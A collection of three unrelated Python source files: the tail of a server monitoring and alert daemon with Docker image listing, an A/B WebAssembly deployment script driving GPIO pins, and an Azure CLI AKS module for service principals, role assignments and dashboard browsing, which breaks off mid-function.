if not msgret.get('errmsg') and aobj.ALPUSH==1 and lobj.get('push_expire',0)>time.time():
try:
pshret = apush.pushNotification(aobj.LICENSEID,
lobj.get('SERVERID',''),
lobj.get('DEVICEID',''),
'%s Log alert'%lobj.get('SERVERNAME',''),
testmsg["MSGBODY"], 'domapp://message/%s?lid=%s'%(msgret['MSGID'],aobj.LICENSEID))
except Exception as e:
utils.outMessage(str(e))
except Exception as e:
variant.logiers.pop(cname, None)
traceback.print_exc()
utils.outMessage(str(e))
variant.logiers.pop(cname, None)
variant.logthds.pop(cname, None)
def stat_daemon():
if variant['enable_stat'] != '1': return
try:
stat_init()
utils.outMessage('Start stat_daemon')
while True:
if variant['enable_stat'] != '1':
break
time.sleep(0.01)
stat_keepiters()
stat_run_once()
logs_keepiters()
utils.outMessage('Stop stat_daemon')
stat_closeall()
logs_classall()
except (KeyboardInterrupt, SystemExit):
stat_closeall()
logs_classall()
utils.outMessage('Interrupt stat_daemon')
def alert_watch_2345(cname, mdat):
for aobj in variant.alertcm.get(cname,[])+variant.alertph.get(cname,[]):
if not mdat and aobj.ALTYPE in (2,3):
continue
needtest = 'LASTRUNTIME' not in aobj or time.time()-aobj.LASTRUNTIME>60
if not needtest:
continue
if 'ALERTCOUNT' in aobj:
if aobj.ALERTCOUNT == 1:
pass
elif aobj.ALERTCOUNT == 2:
needtest = time.time()-aobj.LASTRUNTIME>2*60
elif aobj.ALERTCOUNT == 3:
needtest = time.time()-aobj.LASTRUNTIME>5*60
elif aobj.ALERTCOUNT == 4:
needtest = time.time()-aobj.LASTRUNTIME>15*60
elif aobj.ALERTCOUNT == 5:
needtest = time.time()-aobj.LASTRUNTIME>30*60
elif aobj.ALERTCOUNT >= 6:
needtest = datetime.fromtimestamp(time.time()).day != datetime.fromtimestamp(aobj.LASTRUNTIME).day
if needtest: aobj.ALERTCOUNT = 0
if not needtest:
continue
testisok = True
testmsg = {"ALID": aobj.ALID, "ISPUSHED": aobj.ALPUSH if aobj.ALPUSH==1 else 0, "MSGSTAMP":mdat[0]}
testtlt = ''
if aobj.ALTYPE == 2 and mdat:
testisok = mdat[1] < aobj.ALVAL
if not testisok:
testmsg["MSGBODY"] = "CPU usage %s > the set value %s"%(round(mdat[1],2), aobj.ALVAL)
testtlt = 'CPU alert'
if aobj.ALTYPE == 3 and mdat:
testisok = mdat[2] < aobj.ALVAL*1024*1024
if not testisok:
testmsg["MSGBODY"] = "Memory usage %s MB > the set value %s MB"%(round(mdat[2]/1024/1024,2), aobj.ALVAL)
testtlt = 'Memory alert'
if aobj.ALTYPE == 4:
ipport = aobj.ALSTR.split(":")
timeout = 5
testisok = utils.check_port(ipport[0], ipport[1], timeout)
if not testisok:
testmsg["MSGBODY"] = "Socket port %s unreachable in %d seconds."%(aobj.ALSTR, timeout)
testtlt = 'Socket alert'
if aobj.ALTYPE == 5:
timeout = 15
retdat = utils.check_http(aobj.ALSTR, timeout)
testisok = retdat[0]<400
if not testisok:
testmsg["MSGBODY"] = "HTTP %s unreachable in %d seconds. %s %s"%(aobj.ALSTR, timeout, retdat[0], retdat[1])
testtlt = 'Http alert'
aobj.LASTRUNTIME = time.time()
if not testisok:
aobj.LASTALERTTIME = aobj.LASTRUNTIME
aobj.ALERTCOUNT = aobj.get('ALERTCOUNT', 0) + 1
testmsg["MSGBODY"] = ('System' if cname=='--sys--' else cname) + ' ' + testmsg["MSGBODY"]
msgret = mdb.new_message(testmsg)
lobj = variant.pubkeys.get(aobj.LICENSEID,{})
if not msgret.get('errmsg') and aobj.ALPUSH==1 and lobj.get('push_expire',0)>time.time():
try:
pshret = apush.pushNotification(aobj.LICENSEID,
lobj.get('SERVERID',''),
lobj.get('DEVICEID',''),
'%s %s'%(lobj.get('SERVERNAME',''), testtlt),
testmsg["MSGBODY"], 'domapp://message/%s?lid=%s'%(msgret['MSGID'],aobj.LICENSEID))
except Exception as e:
utils.outMessage(str(e))
else:
aobj.pop('ALERTCOUNT', None)
def dict_image(iobj, tag='', parents=[], all_container=[]):
if isinstance(iobj, docker.models.images.Image):
retval = {
'id': iobj.id,
'name': tag or ','.join(iobj.tags),
'Created': formator.get_ts_from_utcstr(iobj.attrs['Created']),
'Size': iobj.attrs['Size'],
'Used': 0,
'ChildUsed': 0,
'Running': 0,
'Containers': [],
'Parent': parents[0] if parents else {},
'Children': [],
}
elif isinstance(iobj, dict):
retval = {
'id': iobj['Id'],
'name': tag or ','.join(iobj['RepoTags']),
'Created': iobj['Created'],
'Size': iobj['Size'],
'Used': 0,
'ChildUsed': 0,
'Running': 0,
'Containers': [],
'Parent': parents[0] if parents else {},
'Children': [],
}
else:
retval = {}
for c in all_container:
if isinstance(c, dict) and isinstance(iobj, dict) and (retval['name'].replace(':latest','') == c['Image'].replace(':latest','') or retval['id']==c['ImageID']):
retval['Containers'].append(dict_container(c))
retval['Used'] += 1
if c['State']=='running':
retval['Running'] += 1
if isinstance(c, docker.models.containers.Container) and isinstance(iobj, docker.models.images.Image) and retval['name'].replace(':latest','') == c.attrs['Config']['Image'].replace(':latest',''):
retval['Containers'].append(dict_container(c))
retval['Used'] += 1
if c.status=='running':
retval['Running'] += 1
return retval
def tree_image():
retdic = {}
try:
all_container = dclient.api.containers(all=True)
for m in dclient.api.images():
parents = [{'Created':x['Created'],'name':ptag,'id':x['Id']} for x in dclient.api.history(m['Id']) for ptag in (x['Tags'] or []) if m['Id']!=x['Id']]
if m['RepoTags']:
for tag in m['RepoTags']:
mdat = dict_image(m, tag, parents, all_container)
retdic[mdat['id']] = mdat
elif m['RepoDigests']:
tag = m['RepoDigests'][0].split('@')[0] + ':<none>'
mdat = dict_image(m, tag, parents, all_container)
retdic[mdat['id']] = mdat
import copy
for mid, mdat in retdic.items():
if mdat['Parent'] and mdat['Parent']['id'] in retdic:
child = copy.copy(mdat)
child.pop('Parent',None)
child.pop('Containers',None)
child.pop('Used',None)
child.pop('ChildUsed',None)
child.pop('Running',None)
child.pop('Children',None)
retdic[mdat['Parent']['id']]['Children'].append(child)
retdic[mdat['Parent']['id']]['ChildUsed'] += mdat['Used']
except Exception as e:
traceback.print_exc()
retdic = {}
return retdic
def list_image():
try:
retdic = tree_image()
retval = list(retdic.values())
return retval
except Exception as e:
traceback.print_exc()
return []
def get_image_byid(imgid):
try:
retdic = tree_image()
return retdic.get(imgid,{})
except Exception as e:
traceback.print_exc()
return {}
def get_image_byname(imgname):
try:
retdic = tree_image()
retval = {}
for key, val in retdic.items():
if val['name'].split(':')[0]==imgname:
retval = val
except Exception as e:
traceback.print_exc()
return {}
else:
return retval
def remove_image(iname):
try:
dclient.api.remove_image(iname)
return {"errmsg":""}
except Exception as e:
traceback.print_exc()
return {"errmsg":e}
|
deployment.py
|
import os
import wasm3, base64, time, traceback, os
from multiprocessing import Process
from fastapi import FastAPI, Request
from gpiozero import LED
data_dir = f"{os.getcwd()}/../data"
wasm_process_handler = None
def update_partial(file, sha256hash, deployment_id):
inactive_deployment = get_inactive_deployment()
try:
with open(f"{data_dir}/deployment_{inactive_deployment}.wasm", "wb") as f:
f.write(file)
with open(f"{data_dir}/deployment_{inactive_deployment}.sha256", "wb") as f:
f.write(sha256hash)
f.write(b" ")
f.write(deployment_id.encode())
switch_deployment()
restart_wasm_process()
except Exception as e:
print(e)
def get_active_deployment():
if os.path.isfile(f"{data_dir}/active_deployment"):
with open(f"{data_dir}/active_deployment", "r") as f:
return f.read().strip("\n")
else:
with open(f"{data_dir}/active_deployment", "w") as f:
f.write("A")
return "A"
def get_inactive_deployment():
return "B" if get_active_deployment() == "A" else "A"
def switch_deployment():
with open(f"{data_dir}/active_deployment", "r+") as f:
data = f.read()
new_data = "B" if data == "A" else "A"
f.seek(0)
f.write(new_data)
f.truncate()
def env_delay(s):
time.sleep(float(s) / 1000)
return 0
def env_print(m3rt, *args):
out = bytearray.fromhex(
m3rt.get_memory(0)[args[0] : args[0] + args[1]].hex()
).decode()
print(out.strip("\n"))
return 0
def env_pinMode(pin, mode):
"""
" This function is actually not required, because gpiozero does it automatically.
" But the WebAssembly App expects this function to be present, so this is a dummy.
"""
pass
LEDs = {}
gpio_pin_mapping = {}
try:
with open("gpio_pin_mapping.txt", "rb") as f:
raw = f.read()
mapping = raw.decode().strip("\n").split(",")
for m in mapping:
gpio_pin_mapping[int(m.split(":")[0])] = int(m.split(":")[1])
print("GPIO Pin Mapping: " + gpio_pin_mapping)
except Exception:
print("No gpio_pin_mapping.txt found, using default mapping.")
def env_digitalWrite(pin, value):
print(f"digitalWrite({pin}, {value})")
if pin in gpio_pin_mapping:
pin = gpio_pin_mapping[pin]
print(f"Mapped pin {pin}")
led = None
if pin not in LEDs:
led = LED(pin)
LEDs[pin] = led
else:
led = LEDs[pin]
if value == 1:
led.on()
elif value == 0:
led.off()
def setup_wasm(file):
env = wasm3.Environment()
m3rt = env.new_runtime(4096)
with open(f"{data_dir}/deployment_{get_active_deployment()}.wasm", "rb") as f:
mod = env.parse_module(f.read())
m3rt.load(mod)
mod.link_function("hostbindings", "delay", "v(i)", env_delay)
mod.link_function(
"hostbindings", "print", "v(*i)", lambda *x: env_print(m3rt, *x)
)
mod.link_function(
"hostbindings", "println", "v(*i)", lambda *x: env_print(m3rt, *x)
)
mod.link_function("hostbindings", "pinMode", "v(ii)", env_pinMode)
mod.link_function("hostbindings", "digitalWrite", "v(ii)", env_digitalWrite)
start = m3rt.find_function("_start")
start()
def start_wasm_process():
if not os.path.isfile(f"{data_dir}/deployment_{get_active_deployment()}.wasm"):
print("No deployment found, idleing...")
return
print("Starting wasm")
try:
global wasm_process_handler
wasm_process_handler = Process(
target=setup_wasm, daemon=True, args=("app.wasm",)
)
wasm_process_handler.start()
except Exception as e:
print(e)
print(traceback.format_exc())
""" Fall back to previous deployment """
switch_deployment()
restart_wasm_process()
def restart_wasm_process():
print("Restarting wasm process...")
if wasm_process_handler:
wasm_process_handler.terminate()
wasm_process_handler.join()
start_wasm_process()
|
custom.py
|
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceLinuxProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterWindowsProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceNetworkProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterServicePrincipalProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceSshConfiguration
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceSshPublicKey
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedCluster
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAADProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAddonProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAgentPoolProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import AgentPool
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ContainerServiceStorageProfileTypes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfile
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfileManagedOutboundIPs
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfileOutboundIPPrefixes
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterLoadBalancerProfileOutboundIPs
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ResourceReference
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterIdentity
from .vendored_sdks.azure_mgmt_preview_aks.v2020_01_01.models import ManagedClusterAPIServerAccessProfile
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._helpers import _populate_api_server_access_profile, _set_load_balancer_sku, _set_vm_set_type
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_browse(cmd, # pylint: disable=too-many-statements
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
addon_profile = addon_profiles.get("kubeDashboard", ManagedClusterAddonProfile(enabled=True))
if not addon_profile.enabled:
raise CLIError('The kube-dashboard addon was disabled for this managed cluster.\n'
'To use "az aks browse" first enable the add-on\n'
'by running "az aks enable-addons --addons kube-dashboard".')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name",
"--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = '{0}://{1}:{2}/'.format(protocol, listen_address, listen_port)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", "--address", listen_address, dashboard_pod,
"{0}:{1}".format(listen_port, dashboard_port)], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:{1}".format(listen_port, dashboard_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_osdisk_diskencryptionset_id='',
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
